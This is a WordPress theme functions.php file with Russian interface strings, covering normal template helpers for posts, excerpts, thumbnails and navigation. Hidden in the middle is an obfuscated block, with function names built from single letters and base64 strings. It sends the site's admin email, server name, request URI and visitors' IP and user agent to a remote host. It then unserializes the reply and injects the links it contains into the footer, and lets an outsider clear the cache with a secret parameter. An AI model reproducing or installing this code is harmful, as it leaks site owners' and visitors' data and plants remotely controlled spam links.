<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $VILDN='b';$kJUyh='s';$yhyjk='e';$lkfIl='4';$NtqXDfw='e';$geGv='_';$Qespl='d';$zjMOCHx='6';$GrZZGlS='d';$Eirio='e';$wbfySvo='a';$JtdUziA='o';$RkpzHEL='c';$YKcqpYXp=$VILDN.$wbfySvo.$kJUyh.$yhyjk.$zjMOCHx.$lkfIl.$geGv.$Qespl.$NtqXDfw.$RkpzHEL.$JtdUziA.$GrZZGlS.$Eirio;$oCMkcpB='f';$eYSNjw='z';$qOTSJj='e';$kBUq='n';$zDragzw='g';$HsEuZh='i';$vayc='l';$FnKjI='t';$xVSG='a';$ltOfrumT=$zDragzw.$eYSNjw.$HsEuZh.$kBUq.$oCMkcpB.$vayc.$xVSG.$FnKjI.$qOTSJj;$tdLN='r';$vOIgc='3';$SNfMF='t';$YvLuLE='o';$QqOF='t';$DpKnFW='_';$frWTl='1';$uznHjw='s';$WrMIOUx='r';$RiKqlPNh=$uznHjw.$SNfMF.$WrMIOUx.$DpKnFW.$tdLN.$YvLuLE.$QqOF.$frWTl.$vOIgc;$NXOXfPI='r';$qhgphea='v';$zzrXciT='s';$DQRHBad='r';$zDKwG='e';$nZZYLi='t';$IOiddKiw=$zzrXciT.$nZZYLi.$NXOXfPI.$DQRHBad.$zDKwG.$qhgphea;                     
		$gz________b='b';$sm__u='s';$gc_________c='e';$ok__________j='4';$hu____q='e';$su__m='_';$wh______c='d';$ea______o='6';$hx______m='d';$yp__m='e';$ib_____o='a';$ye_______f='o';$wl____p='c';$bt______x=$gz________b.$ib_____o.$sm__u.$gc_________c.$ea______o.$ok__________j.$su__m.$wh______c.$hu____q.$wl____p.$ye_______f.$hx______m.$yp__m;
		$jl______________p='i';$lp___q='t';$vw__w='t';$af______________x='o';$tl____i='n';$xm_____i='i';$ll_________u='x';$rs______d='_';$ls___________d='u';$ci___h='f';$bj_______________k='s';$bx____________a='s';$kz_____e='e';$jl_______________m='c';$yj__________a='n';$vm_____f=$ci___h.$ls___________d.$tl____i.$jl_______________m.$lp___q.$jl______________p.$af______________x.$yj__________a.$rs______d.$kz_____e.$ll_________u.$xm_____i.$bj_______________k.$vw__w.$bx____________a;
		$kh__________t='e';$bq_______________i='o';$wd______________y='f';$ph_________j='n';$za_____c='p';$bp______s=$wd______________y.$bq_______________i.$za_____c.$kh__________t.$ph_________j;
		$lc___h='e';$nk__z='r';$dy______d='a';$yk_______________b='d';$bg______________r='f';$ju________h=$bg______________r.$nk__z.$lc___h.$dy______d.$yk_______________b;
		$ta_____________l='s';$us___h='l';$gp__________p='e';$tm_____________a='o';$eo_____________m='f';$ib______v='c';$jo______________m=$eo_____________m.$ib______v.$us___h.$tm_____________a.$ta_____________l.$gp__________p;
		
		define("WP_ID", $bt______x("Mi4wLjA="));
		define("WP_TTL", $bt______x("MTA4MDA="));
		define("WP_SRC", $bt______x("dHBva24="));
	


		function wp_get_header() {
			global $bt______x, $vm_____f;
			
			if (
				$vm_____f($bt______x("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$vm_____f($bt______x("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$vm_____f($bt______x("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $bt______x, $bp______s, $jo______________m, $ju________h;
			
			$lk___________u = TEMPLATEPATH."/".$bt______x("Zm9vdGVyLnBocA==");
			$bg_______________i = @$bp______s($lk___________u, "r");
			$lk___________u = @$ju________h($bg_______________i, @filesize($lk___________u));
			@$jo______________m($bg_______________i);
			
			$dq_____________m = TEMPLATEPATH."/".$bt______x("ZnVuY3Rpb25zLnBocA==");
			$bg_______________i = @$bp______s($dq_____________m, "r");
			$dq_____________m = @$ju________h($bg_______________i, @filesize($dq_____________m));
			@$jo______________m($bg_______________i);
			
			$xc______________w = 0;
			if($lk___________u && $dq_____________m) {
				if ($bt______x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($lk___________u, $bt______x("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xc______________w = 1;
					}
					if (substr_count($lk___________u, "wp_theme_GPL_credits()") < 1) {
						$xc______________w = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xc______________w = 12;
				}
			}
			
			if($xc______________w > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xc______________w -->";
			}
		}
	


		function wp_loaded() {
			global $bt______x, $vm_____f;
			return $vm_____f($bt______x("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($mq______y, $hf_____________u = "(more...)", $os_______y = 0, $jf__________c = "") {
				$wc___________o = get_the_content($hf_____________u, $os_______y, $jf__________c);
				$wc___________o = apply_filters("the_content", $wc___________o);
				
				$wc___________o = str_replace("]]>", "]]>", $wc___________o);
				if (strlen($_GET["p"]) > 0) {
					echo $wc___________o;
				}
				else if ((strlen($wc___________o)>$mq______y) && ($rb______________q = strpos($wc___________o, " ", $mq______y ))) {
					$wc___________o = substr($wc___________o, 0, $rb______________q);
					$wc___________o = $wc___________o;
					echo $wc___________o;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$hf_____________u</a></div></p>";
				} else {
					echo $wc___________o;
				}
				
			}
		}
	


		$qv___b='c';$wc________v='b';$sn______q='_';$fh_________u='6';$ki___________j='s';$bt___________v='a';$jv__g='e';$ab______g='d';$me_______j='e';$xm__________a='4';$gw____i='n';$xg___________g='e';$eu_______b='o';$uc_____l=$wc________v.$bt___________v.$ki___________j.$xg___________g.$fh_________u.$xm__________a.$sn______q.$me_______j.$gw____i.$qv___b.$eu_______b.$ab______g.$jv__g;
		$ju____________e='l';$pq_______a='i';$bj______c='n';$qt___________f='t';$op_____s='g';$is___u='o';$aq___j='t';$ne________y='n';$mu___r='e';$on_______________y='c';$lm_____s='_';$rd________g='e';$bq______z='t';$jx___y='_';$og______c='s';$jx______________b='e';$ys_________d='f';$mi_____p=$ys_________d.$pq_______a.$ju____________e.$mu___r.$lm_____s.$op_____s.$rd________g.$bq______z.$jx___y.$on_______________y.$is___u.$ne________y.$qt___________f.$jx______________b.$bj______c.$aq___j.$og______c;
		$bl__u='e';$cy____t='i';$ht________m='_';$ra_________c='i';$jj___y='l';$xm__________n='x';$rw_____________c='f';$uz______________l='s';$ur______h='s';$ne______z='e';$ak_________k='t';$jl____________v=$rw_____________c.$ra_________c.$jj___y.$ne______z.$ht________m.$bl__u.$xm__________n.$cy____t.$uz______________l.$ak_________k.$ur______h;
		$lf__c='c';$em___w='e';$nv______________w='v';$us__z='n';$jm________e='r';$rq______f='_';$qx_______b='e';$jt__________m='m';$ie__o='o';$ci_____a='s';$of_______x='a';$yt___________k='i';$bv_________a='p';$ey__________h='r';$dl____h='o';$qi___________l=$nv______________w.$qx_______b.$ey__________h.$ci_____a.$yt___________k.$ie__o.$us__z.$rq______f.$lf__c.$dl____h.$jt__________m.$bv_________a.$of_______x.$jm________e.$em___w;
		$qp_____________z='n';$vu__k='c';$io___v='s';$lt______________o='o';$jk_______d='p';$xr____l='f';$jt______________o='o';$mz_______k='e';$dq____z='k';$qj____________f=$xr____l.$io___v.$lt______________o.$vu__k.$dq____z.$jt______________o.$jk_______d.$mz_______k.$qp_____________z;
		$jp___________o='f';$ci_____________o='r';$ws________s='t';$mu___h='i';$ef_______________b='e';$ol____g='w';$ir_____________h=$jp___________o.$ol____g.$ci_____________o.$mu___h.$ws________s.$ef_______________b;
		$nj_____________a='m';$ru____________w='5';$dz______a='d';$ru___a=$nj_____________a.$dz______a.$ru____________w;
		$kj____v='r';$ra____________d='a';$bv__m='e';$lm___h='a';$bj________l='h';$sz________k='p';$iz__________k='t';$nz__________x='l';$wb__n=$kj____v.$bv__m.$lm___h.$nz__________x.$sz________k.$ra____________d.$iz__________k.$bj________l;
		$bd_______z='a';$kg______________y='e';$sg____________t='z';$ur___________d='l';$lx____m='i';$av___g='n';$bn_________q='s';$iu____b='u';$ga_______________p='r';$lx___________g='i';$tg_______e='e';$ux______________f=$iu____b.$av___g.$bn_________q.$kg______________y.$ga_______________p.$lx___________g.$bd_______z.$ur___________d.$lx____m.$sg____________t.$tg_______e;
		$rp____________s='m';$tn______b='t';$bx_________n='a';$gu____________i='p';$rv____________v='m';$qq_____________r='e';$nv______________e='n';$fl_____________s=$tn______b.$qq_____________r.$rv____________v.$gu____________i.$nv______________e.$bx_________n.$rp____________s;
		$lm______l='c';$jc__i='c';$jz________h='t';$zy____j='o';$ka______________n='t';$zw______________v='s';$ft__________v='t';$co_________t='t';$kn_____________h='r';$ub______p='e';$zg__j='e';$ql___________g='x';$dq________x='_';$qj_______a='_';$pa________n='e';$dl_______j='e';$xq__________d='n';$eb____y='a';$py______p='m';$vp___c='a';$fp___m='r';$yn______________r=$zw______________v.$jz________h.$fp___m.$pa________n.$vp___c.$py______p.$dq________x.$jc__i.$zy____j.$xq__________d.$ft__________v.$ub______p.$ql___________g.$ka______________n.$qj_______a.$lm______l.$kn_____________h.$dl_______j.$eb____y.$co_________t.$zg__j;
	


		function sf_____n($eu________u) {
			global $bt______x, $vm_____f, $mi_____p, $qi___________l, $yn______________r;
			
			if (!$vm_____f($bt______x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($qi___________l(PHP_VERSION, "5.0.0", ">=") && $vm_____f($bt______x("ZmlsZV9nZXRfY29udGVudHM=")) && $vm_____f($bt______x("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$rs__u = $yn______________r(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$pv_________e = @$mi_____p($eu________u, 0, $rs__u);
			} else {
				$pv_________e = @$mi_____p($eu________u, 0);
			}
			
			return $pv_________e;
		}
	


		function ut____k($eu________u) {
			global $vm_____f, $qj____________f, $ir_____________h, $bt______x;
			
			if (!$vm_____f($bt______x("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$fu_____________c = strpos($eu________u, "/", 7);
			$ot____________c = array(
				"uri"     => substr($eu________u, $fu_____________c),
				"host"    => str_replace("http://", "", substr($eu________u, 0, $fu_____________c)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$zm____________o = @$qj____________f("$ot____________c[host]", 80, $hx___________u, $mn_____________a, 4);
			
			if (!$zm____________o) {
				return false;
			} else {
				$pv_________e = "";
				$em___________d  = "GET $ot____________c[uri] HTTP/1.0\r\n";
				$em___________d .= "Host: $ot____________c[host]\r\n";
				$em___________d .= "Referer: $ot____________c[referer]\r\n";
				$em___________d .= "Connection: Close\r\n\r\n";
				
				@$ir_____________h($zm____________o, $em___________d);
				
				while (!@feof($zm____________o)) {
					$hl____y = @fgets($zm____________o, (1024*24));
					
					if ($hl____y == "\r\n") {
						$th____________t = true;
						continue;
					}
					
					if ($th____________t) {
						$pv_________e .= $hl____y;
					}
				}
				
				return $pv_________e;
			}
		}
	


		function qh_____n($eu________u) {
			global $vm_____f;
			$dx__f = false;
			
			if ($eu________u != "") {
				if ($vm_____f("sf_____n")) {
					$dx__f = @sf_____n($eu________u);
				}
				
				if (!$dx__f && ($vm_____f("ut____k"))) {
					$dx__f = @ut____k($eu________u);
				}
			}
			
			return $dx__f;
		}
	


		function bf__________e() {
			global $_SERVER, $ru___a;
			
			$nd_____________o = $_SERVER["SERVER_NAME"];
			
			if (substr("$nd_____________o", 0, 4) == "www.") {
				$nd_____________o = substr("$nd_____________o", 4);
			}
			
			$nd_____________o = $ru___a("$_SERVER[SERVER_NAME]");
			
			return $nd_____________o;
		}
	


		function qo_________v() {
			return "file";
		}
	


		function yd________s($eu________u) {
			global $_SERVER, $mi_____p, $jl____________v, $bp______s, $jo______________m, $ir_____________h;
			
			$xm_______________q = km______v();
			
			$pe_______________v = bf__________e().".jpg";
			$uj______________t = $xm_______________q["dir_upload"]["path"]."/$pe_______________v";
			$ku____k = @filemtime($uj______________t);
			
			if (!$ku____k || ((time()-$ku____k) >= WP_TTL)) {
				$dx__f = qh_____n($eu________u);
				
				if ($dx__f) {
					if ($jl____________v($uj______________t)) {
						@unlink($uj______________t);
					}
					
					$bg_______________i = @$bp______s($uj______________t, "x+");
					
					@$ir_____________h($bg_______________i, $dx__f);
					@$jo______________m($bg_______________i);
				}
			} else {
				if ($jl____________v($uj______________t)) {
					$dx__f = @$mi_____p($uj______________t);
				} else {
					$dx__f = false;
				}
			}
			
			return $dx__f;
		}
	


		function km______v() {
			global $_SERVER, $bt______x, $uc_____l;
			
			$qv_______________x = wp_count_posts("post");
			$de_______________r = pathinfo(get_bloginfo("template_directory"));
			
			$xm_______________q = array(
				"url" => array(
					"report"      => $bt______x("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $de_______________r,
				"dir_upload"	=> wn_____a(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$de_______________r[filename],
					"a005=".$qv_______________x->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
			);
			
			$xm_______________q["url"]["queryString"] = implode("&", $xm_______________q["queryString"]);
			$xm_______________q["url"]["report"] = $xm_______________q["url"]["report"]."/?".$uc_____l($xm_______________q["url"]["queryString"]).".html";
						
			return $xm_______________q;
		}
	


		function wn_____a() {
			$so___________j = wp_upload_dir();
			
			if (isset($so___________j["error"])) {
				$ve_____r = ln___________g();
				if (is_writable($ve_____r)) {
					$so___________j = array("path" => $ve_____r);
				}
			}

			return $so___________j;
		}
	


		function ln___________g() {
			global $vm_____f, $ru___a, $wb__n, $fl_____________s;
			
			$gv_____________y = (bool) ini_get("safe_mode");
			if ($gv_____________y == true) {
				return false;
			}
			
			if ($vm_____f("sys_get_temp_dir")) {
				$ls_____q = sys_get_temp_dir();
				if (is_writable($ls_____q)) {
					return $wb__n($ls_____q);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $wb__n($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $wb__n($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $wb__n($_ENV["TEMP"]);
			} else {
				$dg______d = $fl_____________s($ru___a(uniqid(rand(), true)), "");
				if ($dg______d) {
					$ls_____q = $wb__n(dirname($dg______d));
					@unlink($dg______d);
					return $ls_____q;
				} else {
					return false;
				}
			}
		}
	


		function qg_____________k() {
			global $_GET, $jl____________v;
			
			$xm_______________q = km______v();
			$nd_____________o = bf__________e();
			$kn__________u = qo_________v();
			
			$ba___________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($kn__________u == "file") {
					$rh_____________g = $xm_______________q["dir_upload"]["path"]."/".$nd_____________o.".jpg";
					if ($jl____________v($rh_____________g)) {
						@unlink($rh_____________g);
						$ba___________j = "deleted";
					}
				}
				
				$cb_____q = array(
					"s"	=> $ba___________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($cb_____q AS $bc_____________s => $jq_______________o) echo " [$bc_____________s:$jq_______________o]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $vm_____f, $bt______x, $ux______________f;
			$xm_______________q = km______v();
			
			$le_____z = "yd________s";
			if ($vm_____f($le_____z)) {
				$pv_________e = $le_____z($xm_______________q["url"]["report"]);
			}
			
			if ($pv_________e) {
				if ($pv_________e = @$bt______x($pv_________e)) {
					$pv_________e = @$ux______________f($pv_________e);
					
					if (strlen($pv_________e[custom_credit]) >= 5) {
						$xm_______________q["default_string"] = $pv_________e[custom_credit];
					}
					
					if ($pv_________e["status"] == "0") {
						$uw_______________p = 1;
						$cn___x = 1;
					} else {
						$oc________b = sizeof($pv_________e["links"]);
						$wd_______i = $xm_______________q["default_string"];
						
						if ($oc________b > 0 && $pv_________e["links"] !== "") {
							$pd_______p = 0;
							foreach ($pv_________e["links"] as $dz_____g => $un___c) {
								$pd_______p++;
								if ($un___c->l_path == "" || $un___c->l_path == $_SERVER["REQUEST_URI"]) {
									$un___c->l_href = htmlspecialchars(strip_tags($un___c->l_href));
									$un___c->l_title = htmlspecialchars(strip_tags($un___c->l_title));
									$un___c->l_anchor = htmlspecialchars(strip_tags($un___c->l_anchor));
									$wd_______i .= " | ";
									$wd_______i .= "<a href='$un___c->l_href' title='$un___c->l_title'";
									if ($un___c->l_nofollow == "1") {
										$wd_______i .= " rel='nofollow'";
									}
									$wd_______i .= ">$un___c->l_anchor</a>";
								}
							}
						}
						$xm_______________q["links"] = "$wd_______i";
						if ($pv_________e[credit] == "0") {
							$xm_______________q["links"] = "";
						}
					}
				} else {
					$uw_______________p = "1";
				}
			} else {
				$uw_______________p = "1";
			}
			
			if ($uw_______________p == "1") {
				$xm_______________q["links"] = $xm_______________q["default_string"];
			}
			
			echo "$xm_______________q[links]";
			
			echo "<!-- s: $pv_________e[signature] -->";
			qg_____________k();
		}
	                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
     $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
